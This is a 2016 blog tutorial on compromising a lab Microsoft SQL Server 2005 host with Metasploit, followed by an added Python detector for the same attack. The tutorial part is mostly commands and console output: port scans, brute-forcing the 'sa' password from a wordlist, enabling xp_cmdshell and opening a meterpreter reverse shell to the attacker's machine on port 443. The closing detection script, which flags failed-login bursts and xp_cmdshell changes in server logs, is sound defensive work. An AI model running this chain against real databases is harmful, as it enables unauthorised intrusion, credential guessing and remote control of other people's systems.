By: S-Connect
July 20, 2016

Tutorial: Exploiting MS SQL Server with Metasploit - Fast Track

The exploitee's system comprises:
  • Windows XP Pro Service Pack 2 (unpatched)
  • Firewall and software updates switched off
  • Microsoft Internet Information Services (IIS) (server) and FTP service enabled
  • SQL Server 2005 Express configured
  • A vulnerable web app up and running
Let's begin: Nmap scan from within Metasploit. The pertinent results for this exploit are:

1433/tcp open  ms-sql-s      Microsoft SQL Server 2005 9.00.1399.00
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003

Interestingly, Nmap couldn't definitively identify which Windows Service Pack, but of course, I know it's Service Pack 2. MS SQL is installed by default on TCP port 1433 and UDP port 1434, so I need to confirm port 1434:

nmap -sU 192.168.1.79 -p1434

PORT     STATE         SERVICE
1434/udp open|filtered ms-sql-m

The scan confirms this. Now, use the Metasploit mssql_ping module to pick up more information:

msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 192.168.1.79:
[+] ServerName = LAB
[+] InstanceName = SQLEXPRESS
[+] IsClustered = No
[+] Version = 9.00.1399.06
[+] tcp = 1433
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

There's a lot of information here. Now, brute-force the MS SQL login with mssql_login:

msf > use scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set PASS_FILE /usr/share/set/src/fasttrack/wordlist.txt
PASS_FILE => /usr/share/set/src/fasttrack/wordlist.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_login) > set THREADS 10
THREADS => 10
msf auxiliary(mssql_login) > exploit

[+] 192.168.1.79:1433 - MSSQL - successful login 'sa' : 'password1'

The MS SQL login and password were successfully guessed. Now, use the mssql_payload module, which exploits xp_cmdshell:

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(mssql_payload) > set LPORT 443
LPORT => 443
msf exploit(mssql_payload) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(mssql_payload) > set PASSWORD password1
PASSWORD => password1
msf exploit(mssql_payload) > exploit

[*] Started reverse handler on 192.168.1.70:443
[*] The server may have xp_cmdshell disabled, trying to enable it...
[*] Command Stager progress - 1.47% done (1499/102246 bytes)

[….]

[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1293) at 2013-06-13 10:39:46 +0100

meterpreter >

 So, I’m inside the target machine with the Meterpreter shell. I hope this was helpful to you. Please post your comments and questions below.
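Seen from the defender's side, the password guessing against 'sa' and the xp_cmdshell enablement shown above both leave entries in the SQL Server errorlog. The Python below is an added example, not part of the original tutorial: it flags a burst of failed logins from one client and an xp_cmdshell change that follows it. It assumes failed-login auditing is enabled; the log lines are constructed and the message patterns are modelled on the errorlog wording, so adjust them to your server version.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Patterns modelled on SQL Server errorlog wording (assumption: adjust per version).
LINE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+(\S+)\s+(.*)$")
FAILED = re.compile(r"Login failed for user '([^']*)'\..*\[CLIENT: ([^\]]+)\]")
XP_ON = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")

def detect(lines, threshold=5, window=timedelta(minutes=1),
           follow=timedelta(minutes=10)):
    """Return alerts for failed-login bursts and for xp_cmdshell being enabled."""
    alerts, fails, active, last_burst = [], defaultdict(list), set(), None
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue  # skip continuation or unparsable lines
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S.%f")
        f = FAILED.search(m.group(3))
        if f:
            key = (f.group(2), f.group(1))  # (client IP, login name)
            fails[key] = [t for t in fails[key] if ts - t <= window] + [ts]
            if len(fails[key]) >= threshold and key not in active:
                active.add(key)  # alert once per burst, not once per failure
                alerts.append(("BRUTE_FORCE", ts, key))
                last_burst = ts
            elif len(fails[key]) < threshold:
                active.discard(key)  # burst is over, allow a new alert later
        elif XP_ON.search(m.group(3)):
            chained = last_burst is not None and ts - last_burst <= follow
            alerts.append(("XP_CMDSHELL_ENABLED_AFTER_BRUTE_FORCE" if chained
                           else "XP_CMDSHELL_ENABLED", ts, None))
    return alerts

# Constructed sample (not from the original post): six failures, then the change.
SAMPLE = [f"2013-06-13 10:38:0{i}.15 Logon       Login failed for user 'sa'. "
          "[CLIENT: 192.168.1.70]" for i in range(6)] + [
    "2013-06-13 10:38:05.15 Logon       Error: 18456, Severity: 14, State: 8.",
    "2013-06-13 10:39:40.02 spid52      Configuration option 'xp_cmdshell' "
    "changed from 0 to 1. Run the RECONFIGURE statement to install.",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

An xp_cmdshell change with no preceding burst is still reported, since enabling it on a production instance deserves review on its own.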